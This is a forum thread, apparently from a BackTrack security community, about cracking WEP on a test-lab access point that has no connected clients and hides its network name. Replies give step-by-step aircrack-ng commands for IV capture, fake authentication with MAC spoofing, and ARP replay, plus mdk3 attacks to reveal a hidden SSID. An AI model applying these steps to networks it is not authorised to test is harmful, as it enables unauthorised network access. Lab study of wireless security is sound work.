Check the latest video in BT4 video section...
Cracking WEP with no client
I my test lab I have a AP with no clients connected to it, and I want to crack the WEP key by rebroadcasting the packet that I receive from the AP. I'll finally convert the broadcast packet so that the AP can generates a new IV.
Before this attacks works, I first need to perform a fake authentication. This succeeds when I know the ESSID.
So, question is How can I successfully authenticates without knowing the ESSID and no wireless clients are connected ?
cheers
Damien
Check the latest video in BT4 video section...
oh yes.. thats a really nice question,..Originally Posted by DamienThorn
hi everybody. name is andre, im new in backtrack.
can any body please help to tell me like Damien .
thanks.
Gbu.
first sure start airodump-ng then run
aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0
insert the AP mac address and ur injection enabled ethernet card in place of mon0
Then start aireplay in arp replay mode and watch for magic!
In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
than man-made codes and corruptible devices, there is no such thing as a secret
I have no luck, when I launch the fake auth attack, I get always the message Please specify an ESSID, even when I specify -h and the mac of my machine. So, association was not sucessful.
When I then launch aireplay-ng using arp reply, I got disassociation messages.
Any suggestions ?
Sorry for confusing you with my other post, you should use "-a" and not "-b" (been corrected in the older post), try that and aireplay-ng should not ask for th essid.
Now for the long version of the reply
-------------------------------------------------
Your case
1-You have an AP that is broadcasting its bssid
2- You have no mac addresses of connected clients (even from other, older session not necessarily at the moment of the attach)
The Attack:
A- Start collecting ivs
airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0
make sure you insert the AP bssid in place of xx:xx:xx:xx:xx:xx, the channel number in place of XX, and the name of your injection enabled NIC in place of mon0
B- Run aireplay in fake auth mode
aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0
Insert the AP mac address and the name of you NIC.
If the Access point does not have mac filtering, then you will be able to use the fake authentication attack without the -h argument, otherwise this attack will not work unless you use
aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0
where yy:yy:yy:yy:yy:yy is the mac address of an already connected client (NOT YOUR NIC MAC)
C- finally run aireplay in arp replay mode
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0
again, replace xx:xx:xx:xx:xx:xx with the AP mac and mon0 with your nic name.
Good luck
In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
than man-made codes and corruptible devices, there is no such thing as a secret
Your situation works if the AP is broadcasting its ESSID, but the case is :
1) The AP does not broadcast its ESSID
2) There are no wireless clients connected to the AP
So, in your step B, I cannot use -h YY:YY, since there are no wireless clients
ESSID
The Extended Service Set ID (ESSID) is the name of the network you want to access. It is used to identify different wireless networks.
BSSID
The BSSID is a 48bit identity used to identify a particular BSS (Basic Service Set) within an area.
It is clear you need to do some more reading... these are basics you should be informed about... do your home workand ask me no more questions before you do so
In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
than man-made codes and corruptible devices, there is no such thing as a secret
^
Dude, you are misreading the OPs question completely..
reading abilities.. hmm..
He is talking about a network that is not broadcasting the ESSID..
So a hidden ssid..
There are a couple of options to try and find out what the essid is ;
1. You do a dictionary attack on the network using mdk3.
2. You do a bruteforce attack on the network using mdk3
(not recommended for any ssid over 4 characters..)
3. You monitor the network and wait for someone to probe it / associate with it.
So at Damien ;
When you are running airodump and checking your network, is it mentioning a length 0 ssid, or length 5 or some other value.
If you can actually see how many characters it is. you can decide on whether to use a bruteforce option. If it is length 0 then you will not know, so would need to try the dictionary approach.
Again.. I posted a vid on that specific situation ;
http://forums.remote-exploit.org/bt4...track-4-a.html
Check it out, and obviously, as you know the essid of your network, you can alter wordlists etc to suit the best method of the above.
Error at 'replay-ng
I've been attempting to do this very thing yet when attempting this [code: airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0] I get "Invalid output format :IV's and PCAP format cannot be used together". What am I doing wrong? Thanks in advance for handing down the knowledge.
Posting Permissions